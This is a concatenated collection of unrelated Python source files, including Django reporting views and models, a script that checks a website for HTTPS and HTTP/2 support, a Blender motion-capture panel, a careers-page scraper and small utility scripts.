        cursor.execute('SELECT "Invoice No", i.date as "Invoice Date" '
                       ' , c.name as "Customer Name", i.amount_due AS "Invoice Amount Due" '
                       ' , "Invoice Amount Received", i.amount_due - "Invoice Amount Received" AS "Invoice Amount Not Paid" '
                       ' FROM( SELECT rli.invoice_no as "Invoice No", SUM(rli.amount_paid_here) as "Invoice Amount Received" '
                       ' FROM receipt_line_item as rli '
                       ' GROUP BY rli.invoice_no ) as li '
                       ' JOIN invoice as i '
                       ' ON li."Invoice No" = i.invoice_no '
                       ' INNER JOIN customer as c '
                       ' ON i.customer_code = c.customer_code')
        row1 = dictfetchall(cursor)
        column_name1 = [col[0] for col in cursor.description]
        # Summary: totals over invoices whose balance is non-zero.
        cursor.execute ('SELECT SUM(i.amount_due - "Invoice Amount Received") AS "Total invoice amount not paid", COUNT(li) AS "Number of Invoice not paid" '
                        ' FROM(SELECT rli.invoice_no AS "Invoice No", SUM(rli.amount_paid_here) as "Invoice Amount Received" '
                        ' FROM receipt_line_item as rli '
                        ' GROUP BY rli.invoice_no )as li '
                        ' INNER JOIN invoice as i '
                        ' ON li."Invoice No" = i.invoice_no '
                        ' WHERE i.amount_due - "Invoice Amount Received" != 0 ')
        row2 = dictfetchall(cursor)
        data_report = dict()
        data_report['data'] = row1
        data_report['column_name'] = column_name1
        data_report['data2'] = row2
        return render(request, 'report/report_unpaid_invoice.html', data_report)
|
15,655 | c6b73417b2dd2e133b6b9b1fa5215d61b259164d | """
Name: Raymond Wang
ID: V00802086
Date: JAN 26, 2018
"""
import socket
import sys
import ssl
def main():
    """Resolve the host named on the command line, probe for HTTPS and
    HTTP/2 support, then fetch '/' over port 443 (or port 80 fallback)."""
    if len(sys.argv) != 2:
        print("INVALID INPUT")
        return
    print('\nWebsite: ' + sys.argv[1])
    ip_address = socket.gethostbyname(socket.getfqdn(sys.argv[1]))  # Get IP address
    print('IP: ' + ip_address)
    address = (ip_address, 443)  # HTTPS
    try:
        sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))  # Wrap the socket
        sock.settimeout(1)
        # NOTE(review): connect() returns None on success, so this
        # comparison is always true; failure is reported via the except
        # branch. ssl.wrap_socket is deprecated in modern Python —
        # consider ssl.SSLContext().wrap_socket.
        if sock.connect(address) != socket.error:  # Check for HTTPS support
            print('Support of HTTPS: YES')
            https = True
            sock.close()
    except Exception as e:
        print('Support of HTTPS: NO ', e)  # Not support HTTPS
        https = False
    try:
        # NOTE(review): get_http2_ssl_context / establish_tcp_connection /
        # negotiate_tls are not defined in this part of the file; if they
        # are missing at runtime, the NameError is swallowed here and the
        # site is reported as not supporting HTTP/2 — confirm they exist
        # elsewhere in the module.
        context = get_http2_ssl_context()
        connection = establish_tcp_connection(sys.argv[1])
        negotiate_tls(connection, context, sys.argv[1])
        print('The newest HTTP versions that the web server supports: HTTP/2')
        support_http2 = True
    except Exception as e:
        support_http2 = False
    if https:
        print('Connecting over port 443...\n')
        port443(ip_address, support_http2)
    else:
        print('Connecting over port 80...\n')
        port80(ip_address, support_http2)
def port80(ip_address, support_http2):
    """Fetch '/' over plain HTTP (port 80) and report the protocol
    version, status code, redirects and Set-Cookie headers.

    NOTE(review): uses the module-level sys.argv[1] for the Host header,
    and on 301/302 retries over port 443 without consulting the Location
    header — confirm this behavior is intended.
    """
    s = ''
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        address = (ip_address, 80)  # HTTP
        sock.connect(address)  # Connect to HTTP address
        count = sock.sendall(bytes('GET / HTTP/1.1\r\nHost: ' + sys.argv[1] + '\r\nConnection: keep-alive\r\n\r\n',
                                   'utf8'))  # GET request
        if count == 0:  # If failed to send
            # NOTE(review): sendall() returns None on success, so this
            # branch never triggers — confirm.
            print('Failed to check HTTP')
        buf = sock.recv(1024)  # Receiving response
        while len(buf):
            s = s + bytes.decode(buf)
            buf = sock.recv(1024)
    except Exception as e:
        # A timeout typically ends the receive loop; whatever was read so
        # far is parsed below.
        sock.close()
    count = 0  # number of Set-Cookie headers seen so far
    # Parse the raw response header block line by line, up to the blank
    # line that terminates the headers.
    while True:
        index = s.find('\n')
        if index == -1:
            s2 = s
        else:
            s2 = s[:index]
        if len(s2) == 0 or s2[0] == '\r':
            break
        if s2.find('HTTP') == 0:  # Checking HTTP version
            if not support_http2:  # If not HTTP/2
                print('The newest HTTP versions that the web server supports: ' + s2[:8])
            # Status code is the three characters after 'HTTP/x.y '.
            s7 = s2[9:12]
            if s7 == '505':  # Check status code
                print('Status code: ' + s7 + ' - HTTP version not supported')
            if s7 == '404':
                print('Status code: ' + s7 + ' - File not found')
            if s7 == '301':
                print('Status code: ' + s7 + ' - Moved permanently')
                print('Redirecting to new location... (over port 443)\n')
                port443(ip_address, support_http2)  # port443 to new location
                break
            if s7 == '302':
                print('Status code: ' + s7 + ' - Found')
                print('Redirecting to new location... (over port 443)\n')
                port443(ip_address, support_http2)  # port443 to new location
                break
            if s7 == '200':
                print('Status code: ' + s7 + ' - OK')
            else:
                # NOTE(review): this else pairs only with the 200 check, so
                # 505/404 codes are printed twice — confirm intended.
                print('Status code: ' + s7)
        if s2.find('Set-Cookie') == 0:  # Check if contain Set-Cookie
            s3 = s2[12:]
            index2 = s3.find('=')
            key = s3[:index2]  # Get Set-Cookie key
            s3 = s3[index2 + 1:]
            index3 = s3.find(';')
            domain = ''  # domain value
            if index3 != -1:
                index4 = s3.find('domain=')  # Get domain
                if index4 != -1:
                    domain = s3[index4 + 7:]
                    index5 = domain.find(';')
                    # NOTE(review): index5 was found in ``domain`` but is
                    # used to slice ``s3`` — verify the intended substring.
                    domain = s3[index4 + 7:index5]
            if count == 0:  # First time received this Set-Cookie
                print('List of Cookies: ')
                count = count + 1
            print('* name: ' + key + ', domain name: ' + domain)
        if index == -1:  # String end, break
            break
        s = s[index + 1:]  # Delete this row
def port443(ip_address, support_http2):
    """Probe the web server on port 443 (HTTPS) with a plain HTTP/1.1 GET.

    Prints the negotiated HTTP version (unless HTTP/2 support is already
    known), the status code, and any Set-Cookie headers found.  On 301/302
    the probe is retried over port 80 via port80().

    Params:
    - ip_address (str): IP address of the target host
    - support_http2 (bool): True if the server is known to support HTTP/2
      (suppresses the HTTP-version line)
    """
    a = ''
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # ssl.wrap_socket() was removed in Python 3.12; build the equivalent
        # non-verifying client context (old module-level wrap_socket did no
        # certificate validation and no hostname check either).
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock)
        sock.settimeout(1)
        address = (ip_address, 443)  # HTTPS
        sock.connect(address)
        # sendall() returns None on success and raises on failure, so the
        # old "if count == 0: print failure" check was dead code; errors are
        # handled by the except clause below.
        sock.sendall(bytes('GET / HTTP/1.1\r\nHost: ' + sys.argv[1] + '\r\nConnection: keep-alive\r\n\r\n',
                           'utf8'))  # GET request
        buf = sock.recv(1024)  # Receiving response
        while len(buf):
            a = a + bytes.decode(buf)
            buf = sock.recv(1024)
    except Exception:
        sock.close()
    count = 0  # number of Set-Cookie headers seen so far
    while True:
        index = a.find('\n')
        if index == -1:
            s2 = a
        else:
            s2 = a[:index]
        if len(s2) == 0 or s2[0] == '\r':
            break  # blank line: end of the header section
        if s2.find('HTTP') == 0:  # Status line: check HTTP version
            if not support_http2:
                print('The newest HTTP versions that the web server supports: ' + s2[:8])
            s7 = s2[9:12]
            if s7 == '505':  # Check status code
                print('Status code: ' + s7 + ' - HTTP version not supported')
            if s7 == '404':
                print('Status code: ' + s7 + ' - File not found')
            if s7 == '301':
                print('Status code: ' + s7 + ' - Moved permanently')
                print('Redirecting to new location... (over port 80)\n')
                port443_retry = port80  # retry the probe over plain HTTP
                port443_retry(ip_address, support_http2)
                break
            if s7 == '302':
                print('Status code: ' + s7 + ' - Found')
                print('Redirecting to new location... (over port 80)\n')
                port80(ip_address, support_http2)  # retry over plain HTTP
                break
            if s7 == '200':
                print('Status code: ' + s7 + ' - OK')
            else:
                print('Status code: ' + s7)
        if s2.find('Set-Cookie') == 0:  # Check if contain Set-Cookie
            s3 = s2[12:]
            index2 = s3.find('=')
            key = s3[:index2]  # cookie name
            s3 = s3[index2 + 1:]
            index3 = s3.find(';')
            domain = ''  # domain attribute value
            if index3 != -1:
                index4 = s3.find('domain=')  # Get domain
                if index4 != -1:
                    domain = s3[index4 + 7:]
                    # BUG FIX: trim the value at the following ';' — the
                    # port-80 code path does this, this one did not.
                    index5 = domain.find(';')
                    if index5 != -1:
                        domain = domain[:index5]
            if count == 0:  # print the list title before the first cookie
                print('List of Cookies: ')
            count = count + 1
            print('* name: ' + key + ', domain name: ' + domain)
        if index == -1:  # String end, break
            break
        a = a[index + 1:]  # Delete this row
def establish_tcp_connection(host, port=443):
    """Open a TCP connection to *host*.

    Params:
    - host (str): host name or IP address
    - port (int): TCP port; defaults to 443 (HTTPS) so existing callers
      are unchanged, but the helper now works for any service

    Returns:
    - socket.socket: the connected socket
    """
    return socket.create_connection((host, port))
def get_http2_ssl_context():
    """Build an SSL context suitable for negotiating HTTP/2 via ALPN.

    Follows RFC 7540 section 9.2: TLS 1.2 or newer, no TLS compression,
    and modern AEAD cipher suites.

    Returns:
    - ssl.SSLContext: context advertising "h2" (preferred) then "http/1.1"
    """
    ctx = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
    # minimum_version replaces the deprecated ssl.OP_NO_SSLv* / OP_NO_TLSv*
    # option flags (deprecated since Python 3.7).
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # RFC 7540 forbids TLS-level compression (CRIME attack surface).
    ctx.options |= ssl.OP_NO_COMPRESSION
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20")
    ctx.set_alpn_protocols(["h2", "http/1.1"])
    try:
        # NPN is the legacy predecessor of ALPN; not supported everywhere.
        ctx.set_npn_protocols(["h2", "http/1.1"])
    except NotImplementedError:
        pass
    return ctx
def negotiate_tls(tcp_conn, context, host):
    """Wrap *tcp_conn* in TLS and require that HTTP/2 ("h2") was negotiated.

    Params:
    - tcp_conn (socket.socket): an already-connected TCP socket
    - context (ssl.SSLContext): context advertising "h2" via ALPN/NPN
    - host (str): server hostname used for SNI/certificate checks

    Raises:
    - RuntimeError: if neither ALPN nor NPN selected "h2"
    """
    tls_conn = context.wrap_socket(tcp_conn, server_hostname=host)
    # Prefer the ALPN result; fall back to legacy NPN only when ALPN
    # produced nothing.
    chosen = tls_conn.selected_alpn_protocol()
    if chosen is None:
        chosen = tls_conn.selected_npn_protocol()
    if chosen != "h2":
        raise RuntimeError("Didn't negotiate HTTP/2!")
    return tls_conn
if __name__ == '__main__':
    # Script entry point; main() is defined earlier in this file.
    main()
    print('\n')
|
15,656 | 4487f0af7c4f6fadfc33a60566af54f392bc21a2 | from django.db import models
from django.utils.translation import ugettext_lazy as _
from treebeard.mp_tree import MP_Node
from myproject.apps.core.models import CreationModificationDateBase
class Category(MP_Node, CreationModificationDateBase):
    """Category stored as a treebeard materialized-path (MP) tree node,
    with created/modified timestamps from CreationModificationDateBase."""
    title = models.CharField(_("Title"), max_length=200)
    class Meta:
        verbose_name = _("Category")
        verbose_name_plural = _("Categories")
    def __str__(self):
        return self.title
|
15,657 | 7b480ea8f4e5c7f69cfd06deb63fdd8ed9b78e2a | print('\n\tHello i am eng, module from extra')
|
15,658 | 5eee8fdadd02b3ae0d8bb9509472a071e0d62796 | from django.apps import AppConfig
class ServicesConfig(AppConfig):
    """Django app configuration for the 'services' app."""
    name = 'services'
    # Human-readable name shown publicly instead of 'services'
    # ("Gestor de servicios" = "service manager").
    verbose_name = 'Gestor de servicios'
|
15,659 | 5fbb53b5a8a40d331b3300457d66006f068c0bc2 | items = ["dota", "LOL","csgo"]
if "LOL" in items:
items.remove("LOL")
print(items)
else:
print("There is no LOL") |
15,660 | 21a3465ff8f04bcb7e522342a559383e45531cff | from django.conf.urls.defaults import *
from django.conf import settings
from licorn.foundations import hlstr
# Legacy Django (<1.8) URLconf for the 'energy' app: view names resolve
# relative to the 'energy.views' module prefix given to patterns().
urlpatterns = patterns('energy.views',
    (r'^/?$', 'policies'),
    (r'^policies/?$', 'policies'),
    # Rule management; add_rule gets extra kwarg {'new': False}.
    (r'^add_rule/(?P<who>.*)/(?P<hour>.*)/(?P<minute>.*)/(?P<day>.*)/?$', 'add_rule', {'new': False}),
    (r'^del_rule/(?P<tid>.*)/?$', 'del_rule'),
    (r'^get_recap/?$', 'get_recap'),
    (r'^get_calendar_data/?$', 'get_calendar_data'),
    (r'^generate_machine_html/(?P<mid>.*)/?$', 'generate_machine_html'),
    (r'^get_machine_list/?$', 'get_machine_list'),
    #(r'^get_machines_html/(?P<machines>.*)/?$', 'get_machines_html'),
)
|
15,661 | 03b13210ac1646d97fa1fdacafa40142a6648066 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,HttpResponse
from .models import Cars
# Create your views here.
def home_view(request,marka):
    """Return an HttpResponse for the first matching hard-coded car brand.

    NOTE(review): the `marka` URL parameter is never used — the loop
    matches the literal strings "BMW"/"Audi" instead; confirm whether
    filtering by `marka` was intended.  If no car matches, the view
    implicitly returns None, which Django rejects at runtime.
    """
    item_cars = Cars.objects.all()
    A=0  # number of BMW matches seen so far (loop exits after A > 1)
    for i in item_cars:
        if (A > 1):
            break
        if(i.marka == "BMW"):
            A=A+1
            return HttpResponse('<h>%s comforline</h>' %i.marka)
        if(i.marka =="Audi"):
            return HttpResponse('<h>%s comfort</h>' % i.marka)
    #return HttpResponse('<h>hosgeldin</h>')
#return HttpResponse('<h>hosgeldin</h>') |
15,662 | 72b488bc92f9f38e2cacc25e92100581d22e7508 | import bpy
class OBJECT_PT_IMUPanel(bpy.types.Panel):
    """Sidebar panel (3D View > 'Motion Capture' tab) for the IMU suit.

    NOTE(review): the original docstring said "Object properties window",
    but bl_space_type/bl_region_type place this panel in the 3D View UI
    sidebar.
    """
    bl_label = "IMU Suit"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_idname = "VIEW3D_PT_imu"
    bl_category = 'Motion Capture'
    def draw(self, context):
        """Draw all panel widgets; state lives in context.scene.mc_settings."""
        settings = context.scene.mc_settings
        # Server start/stop toggle showing live FPS while running.
        label = ("Stop Server (FPS: %.2f)" % settings.fps) if settings.start else "Start Server"
        row = self.layout.row()
        row.prop(settings, 'start', text=label, toggle=True, icon="PARTICLE_DATA")
        # Recording toggle showing the current frame count while recording.
        label = ("Stop Recording - %.0f" % settings.frame_number) if settings.start_rec else "Start Recording"
        row = self.layout.row()
        row.prop(settings, 'start_rec', text=label, toggle=True, icon="OUTLINER_OB_CAMERA")
        # Pose configuration: target object and T-pose capture buttons.
        box = self.layout.box()
        box.label(text="Pose Config:")
        box.prop(settings, "obj")
        row = box.row()
        row.operator('wm.mocap_set_tpose_operator', icon="OUTLINER_OB_ARMATURE")
        timer = row.operator('wm.mocap_set_tpose_operator', text="T-Pose Timer", icon="TIME")
        timer.timer = 5  # delayed T-pose capture, in seconds
        self.layout.separator()
        # Bone mapping; rows are disabled unless a pose bone is selected.
        box = self.layout.box()
        row = box.row()
        row.label(text="Selected Bone: " + bpy.context.active_pose_bone.name if bpy.context.active_pose_bone is not None else "" )
        row.enabled = True if bpy.context.active_pose_bone is not None else False
        row = box.row()
        row.enabled = True if bpy.context.active_pose_bone is not None else False
        bone = row.operator('wm.mocap_set_bone_operator', icon="POSE_HLT")
        if context.scene.mc_settings.selected_id != '':
            bone.sensor_str, bone.sensor_x, bone.sensor_y = context.scene.mc_settings.keyToSensors(context.scene.mc_settings.selected_id)
        self.layout.separator()
        # Per-node IMU configuration for the currently selected sensor id.
        box = self.layout.box()
        box.label(text="IMU Node Config:")
        if context.scene.mc_settings.selected_id != '':
            row = box.row()
            # selected_id encodes the sensor address: chars [0:1] and [1:2]
            # index into the 'imu' grid, the remainder ([2:]) is the map key.
            sensor = settings.mapping[settings.selected_id[2:]]['imu'][int(context.scene.mc_settings.selected_id[0:1])][int(context.scene.mc_settings.selected_id[1:2])]
            if 'bone_name' in sensor:
                row.label(text="Mapped Bone: " + sensor['bone_name'])
        row = box.row()
        row.prop(settings, "selected_id")
        row = box.row()
        row.prop(settings, "button_function")
        row.separator()
        # Physical mounting orientation of the IMU hardware.
        box = self.layout.box()
        box.label(text="IMU Physical Orientation:")
        row = box.row()
        row.prop(settings, "ui_forward")
        row = box.row()
        row.prop(settings, "ui_mirror")
        self.layout.prop(settings, "flip_x")
        self.layout.prop(settings, "swap_l_r")
        self.layout.separator()
        self.layout.separator()
        # Misc: dependency installer, server port and mapping template.
        self.layout.operator('wm.mocap_install_packages_operator', icon="IMPORT")
        self.layout.prop(settings, 'port')
        self.layout.prop(settings, "template")
register, unregister = bpy.utils.register_classes_factory([OBJECT_PT_IMUPanel])
if __name__ == "__main__":
register() |
15,663 | ceb9d2702d9c036e9f5058a668a805b8052a5c9e | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-11 16:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Creates the landing app's ImportantNews and OrdinaryNews tables
    (identical schemas: title plus short/full text fields)."""
    dependencies = [
        ('landing', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='ImportantNews',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=1000)),
                ('shorttext', models.CharField(max_length=2000)),
                ('fulltext', models.CharField(max_length=10000)),
            ],
        ),
        migrations.CreateModel(
            name='OrdinaryNews',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=1000)),
                ('shorttext', models.CharField(max_length=2000)),
                ('fulltext', models.CharField(max_length=10000)),
            ],
        ),
    ]
|
15,664 | 527779dd3190f387103b722c6dc858c8e9ac52fe | from django.db import models
from sis_gastronomico.empleados.models import Empleado
# Create your models here.
class Horario(models.Model):
    """Work-shift schedule: a name plus its start (desde) / end (hasta) times."""
    horario = models.CharField(max_length=35)
    desde = models.TimeField()
    hasta = models.TimeField()
    # BUG FIX: auto_now / auto_now_add were swapped.  auto_now_add stamps the
    # row once at creation; auto_now refreshes it on every save.
    fecha_creacion = models.DateTimeField(auto_now_add=True)
    fecha_modificacion = models.DateTimeField(auto_now=True)
    class Meta:
        ordering = ["desde"]
    def __str__(self):
        return "{:s} - De {:s} a {:s}".format(
            self.horario.title(),
            self.desde.strftime("%H:%M"),
            self.hasta.strftime("%H:%M"),
        )
class Turno(models.Model):
    """A shift on a given date, linking a Horario with its Empleados."""
    horario = models.ForeignKey(Horario, models.CASCADE)
    # NOTE(review): auto_now=True refreshes `fecha` on EVERY save — confirm
    # whether auto_now_add (set once at creation) was intended here too.
    fecha = models.DateField(auto_now=True)
    empleados = models.ManyToManyField(Empleado)
    # BUG FIX: auto_now / auto_now_add were swapped (same defect as Horario).
    fecha_creacion = models.DateTimeField(auto_now_add=True)
    fecha_modificacion = models.DateTimeField(auto_now=True)
    activo = models.BooleanField(default=True)
    def __str__(self):
        return "{:s} - {:s} ".format(str(self.fecha), str(self.horario))
|
15,665 | cdcd32e043e8ad3fc5dcd3285dbac3e306a39f1e | import os
import sys
def check_report_html():
    """Scan ./report.html (pytest-html output) for failed test rows.

    Returns:
    - int: 0 when there is no report or no failures; 1 when a failed row
      is found or the report cannot be read.
    """
    if not os.path.exists("report.html"):
        # A missing report is treated as "nothing to check", not a failure
        # (preserves the original exit semantics).  Typo "exits" fixed.
        print("report.html file not exists")
        return 0
    try:
        with open("report.html", "r") as f:
            report_cont = f.read()
        # pytest-html marks failing tests with this CSS class.
        if report_cont.find("failed results-table-row") != -1:
            print("chip or board support package test failed, please check it and repair!")
            return 1
    except Exception as err:
        print("Error message : {0}.".format(err))
        return 1
    return 0
if __name__ == "__main__":
    # Propagate the check result as the process exit code (0 = OK).
    sys.exit(check_report_html())
|
15,666 | 7e1cd9309b1522d664072ea8d71c806f2dd6d583 | import pandas as pd
from convokit import Corpus, download
# This scripts downloads the following datasets using ConvKit (https://convokit.cornell.edu/)
# - Stanford Politeness Corpus (Wikipedia)
# - Stanford Politeness Corpus (Stack Exchange)
# This code is based on the following notebook:
# - https://github.com/CornellNLP/Cornell-Conversational-Analysis-Toolkit/blob/master/examples/conversations-gone-awry/Conversations_Gone_Awry_Prediction.ipynb
# For each politeness corpus: download it, re-index its conversations and
# utterances, and dump (text, label) pairs to a CSV next to this script.
for dataset_name in ['stack-exchange-politeness-corpus', 'wikipedia-politeness-corpus']:
    corpus = Corpus(filename=download(dataset_name))
    kept_conversations = {c.id: c for c in corpus.iter_conversations()}
    kept_utterances = {}
    for convo_id in kept_conversations:
        for utterance in kept_conversations[convo_id].iter_utterances():
            kept_utterances[utterance.id] = utterance
    # Overwrite the corpus indexes with the rebuilt dictionaries.
    corpus.conversations = kept_conversations
    corpus.utterances = kept_utterances
    print('{}: {} utterances'.format(dataset_name, len(corpus.utterances)))
    texts = [ corpus.utterances[id].text for id in iter(corpus.utterances) ]
    # 'Binary' metadata carries the politeness label.  NOTE(review): exact
    # label semantics assumed from the corpus docs — confirm before use.
    labels = [ corpus.utterances[id].meta['Binary'] for id in iter(corpus.utterances) ]
    df = pd.DataFrame(data={
        'text': texts,
        'label': labels
    })
    df.to_csv('./{}.csv'.format(dataset_name), index=False)
|
15,667 | 632b0362fe2d240a99c46bba9d0e879b554d20b6 | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 24 17:22:39 2015
@author: xf05id1
"""
import pyxrf.model.fileio as fio
import string
import sys
import srxdatadir
#dfx3filedir = '/data/XSPRESS3/2015-3/in-house/'
#dfpyxrffoutdir='/nfs/xf05id1/data/pyxrf_analysis/unsorted/'
def x3toPyxrf(x3dir=srxdatadir.dfx3filedir, fileprefix=None, foutdir=srxdatadir.dfpyxrffoutdir, filenum=0):
    """Convert one Xspress3 HDF5 file (plus its scan log) to a pyXRF HDF5.

    NOTE: Python 2 code (print statements, string.split).

    Params:
    - x3dir: directory holding the Xspress3 .hdf5 files
    - fileprefix: timestamp prefix as shown on the Xspress3 screen, e.g.
      '2015_10_25_21_14' (a trailing '_' is tolerated); required
    - foutdir: output directory for the pyXRF-format file
    - filenum: numeric suffix of the input file
    """
    print 'input file directory:', x3dir
    if fileprefix == None:
        print "please provide a fileprefix as indicated in Xspress3 screen. E.g. '2015_10_25_21_14'"
        sys.exit()
    if fileprefix[-1] == '_':
        # Tolerate a trailing underscore in the prefix.
        fileprefix=fileprefix[0:-1]
    fin=x3dir+fileprefix+'_'+str(filenum)+'.hdf5'
    print 'input file:', fileprefix+'_'+str(filenum)
    print 'ouput file directory:', foutdir
    # Derive the per-day scan-log directory from the date parts (Y/M/D) of
    # the prefix.
    dirf = string.split(fileprefix, sep='_')
    textfiledir = '/nfs/xf05id1/data/'+ dirf[0] + '/' + dirf[1] + '/' + dirf[2] + '/'
    textfilename = 'log_' + fileprefix + '_srx-2dscan-sdd-timeout.py.txt'
    flog=textfiledir+textfilename
    print 'ouput file name:', fileprefix+'_pyxrf.h5'
    fout=foutdir+fileprefix+'_pyxrf.h5'
    fio.xspress3_data_to_hdf(fin, flog, fout)
#for (fin, flog, fout) in zip(finList, flogList, foutList):
# print fin
# print flog
# print fout
|
15,668 | ad76e8f3e9856290b8840f485859819aa9348a8d | import matplotlib.pyplot as plt
import pickle
import sys
import os
# Paths to the trained model and its pickled training history, relative to
# this script's directory.
DIRNAME = os.path.dirname(os.path.realpath(__file__))
OUT_DIR = os.path.join(DIRNAME, 'out')
MODEL = os.path.join(OUT_DIR, 'ann.hdf5')
HIST = os.path.join(OUT_DIR, 'ann.hist')
# Fail fast if a previous training run did not produce both artefacts.
if not os.path.exists(MODEL):
    print("missing model:", MODEL)
    sys.exit(1)
if not os.path.exists(HIST):
    print("missing history:", HIST)
    sys.exit(1)
def plot(history):
    """Plot training/validation accuracy and loss curves from a Keras-style
    history dict, then display both figures."""
    def _metric_figure(train_key, val_key, title, ylabel):
        # One figure per metric: train vs. validation across epochs.
        plt.figure()
        plt.plot(history[train_key])
        plt.plot(history[val_key])
        plt.title(title)
        plt.ylabel(ylabel)
        plt.xlabel('epoch')
        plt.legend(['train', 'test'], loc='upper left')
    _metric_figure('acc', 'val_acc', 'model accuracy', 'accuracy')
    _metric_figure('loss', 'val_loss', 'model loss', 'loss')
    plt.show()
if __name__ == '__main__':
    # Load the pickled training history and report the best validation
    # metrics before plotting the curves.
    history = pickle.load(open(HIST, "rb"))
    print('val_loss:', min(history['val_loss']))
    print('val_acc:', max(history['val_acc']))
    try:
        plot(history)
    except KeyboardInterrupt as e:
        # Allow Ctrl-C to close the plot windows without a traceback.
        sys.exit(0)
|
15,669 | fb089958b51b01aaa61852dd3eb767c806fde2e4 | import pandas as pd
import os
#import json
# Read product titles from a CSV and write them out as {"products": [...]}.
# NOTE(review): the raw '\data\...' paths are Windows-specific.
csv_file_path = os.getcwd() + r'\data\test_products.csv'
df = pd.read_csv (filepath_or_buffer=csv_file_path, sep=',', header=0)
df.head()  # NOTE(review): return value unused — leftover from a notebook?
df_title = df[['title']].copy()
df_title.head()
json_file_path = os.getcwd() + r'\data\test_products.json'
#df_title.to_json (json_file_path, orient='records', indent=4)
json1 = df_title.to_json (orient='records')
# Wrap the records array in a top-level "products" key by hand.
test_products = '{"products": ' + json1 + '}'
#json_load = json.loads(test_products)
#json_dump = json.dumps(json1, indent=4)
#print(json_dump)
# NOTE(review): file opened without a context manager; closed manually below.
test_products_json_file = open(json_file_path, 'wt')
#test_products_json_file.write(json_dump)
test_products_json_file.write(format(test_products))
test_products_json_file.close()
|
15,670 | 10476e83a427770208a751de475a2dc35b7cedf6 | # Peter Dorsaneo
#
# Summer 2019 FIS(h) Tank Project, Team 3
# ========================================
# Python script to load a Chrome web page of the FIS Careers website and auto
# load the list of available intern positions.
#
# USAGE: python main.py
from constants import *
from splinter import Browser
from time import sleep
# browser = Browser('chrome')
browser = Browser('chrome', headless=True) # Doesn't display Chrome
# Visit URL.
browser.visit(JOB_SEARCH_URL)
# Find and click on the 'Intern' positions from the website.
option = browser.find_by_xpath('//select[@id="com.peopleclick.cp.formdata.JPM_DURATION"]//option[@value="7"]')
option.click()
# Javascript injection to unselect the option for 'all' positions.
# Without this, the webpage will still load all the open positions from the site.
browser.execute_script('document.getElementsByTagName("select")[3].getElementsByTagName("option")[0].selected = false')
# Select the most results per page that we can display. This is to be a quick
# and easy method for getting the whole list of internships currently available.
browser.execute_script('document.getElementById("com.peopleclick.cp.formdata.hitsPerPage").getElementsByTagName("option")[0].selected = false')
browser.execute_script('document.getElementById("com.peopleclick.cp.formdata.hitsPerPage").getElementsByTagName("option")[3].selected = true')
# Find and click the 'Search' button from the website.
button = browser.find_by_id('sp-searchButton')
button.click()
# Pause for bit to let things load due to potentially bad connections.
sleep(2)
# Extract the job positions as titles from the website.
positions = browser.find_by_css('div[class=" pf-sr-titleInnerWrapper"] > a')
# Extract the locations of the each of the jobs.
locations = browser.find_by_css('div[class="clearfix col-xs-12 col-sm-7 col-md-8 pf-padding-left pf-rwd-titlefieldsbox"] > div > span[id="com.peopleclick.cp.fieldlabel.index_0.JPM_LOCATION_value"]')
# Extract the brief descriptions from the job posting, this does not work currently.
# descriptions = browser.find_by_css('div[class="col-xs-12 visible-xs pf-paddingzero pf-rwd-jobPostDecription pf-rwd-wordwrap"] > span[id="com.peopleclick.cp.fieldlabel.index_0.JPM_DESCRIPTION_value"] > span[class="ng-binding"]')
# We will store the relevant job data into a list of dictionaries for our data
# structure.
job_list = []
# Add the jobs position and location as a dictionary to our job_list.
for position, location in zip(positions, locations):
    job_list.append({POSITION : position.value, LOCATION : location.value, LINK : position['href']})
# NOTE(review): 'file' shadows the builtin name and is opened without a
# context manager (closed manually below).
file = open('internships.txt', 'w')
# write the position and locations from our job listings into a text file.
for jobs in job_list:
    # we know we only have two keys (so far) so use those.
    file.write('{}\n'.format(jobs[POSITION]))
    file.write('{}\n'.format(jobs[LOCATION]))
    file.write('{}\n'.format(jobs[LINK]))
# Cleanup :)
file.close()
|
15,671 | 542a6f74b91a9a8967a90859e957e888509dedf0 | class BankAccount:
ROI = 10.5;
def __init__(self):
self.Name = input("Enter The Name: ");
self.Amount = float(input("Enter The Amount: "));
def Deposit(self):
self.Amount = self.Amount + int(input("Enter The amount To be Deposit: "));
def Withdraw(self):
self.Amount = self.Amount - int(input("Enter The amount To be Withdrawn: "));
def CalculateIntrest(self):
self.Amount = self.Amount + (self.Amount * self.ROI * 1) / 100;
def Display(self):
print ("Account Holder Name : ", self.Name, " and Total Saving: ", self.Amount);
def main():
    """Interactive demo: create an account, then deposit, withdraw and
    apply interest, printing the balance after each step."""
    obj1 = BankAccount();
    obj1.Display();
    obj1.Deposit();
    obj1.Display();
    obj1.Withdraw();
    obj1.Display();
    print("Before Calculating Interest: ");
    obj1.Display();
    obj1.CalculateIntrest();
    print("After Calculating Interest: ");
    obj1.Display();
if __name__ == "__main__":
    # Run the interactive demo only when executed as a script.
    main();
|
15,672 | 10344e02035c3e8d968d74e91b085c4a93ff5abd | import numpy as np
from numpy import ndarray
def mae(y_preds: ndarray, y_actual: ndarray) -> float:
    """Mean Absolute Error between predictions and targets.

    Args:
        y_preds: predicted values.
        y_actual: ground-truth values, broadcast-compatible with y_preds.

    Returns:
        The mean of |y_preds - y_actual| as a plain Python float.
    """
    # float() makes the return type match the annotation (np.mean returns a
    # NumPy scalar).  Docstring typo "Absoulte" also fixed.
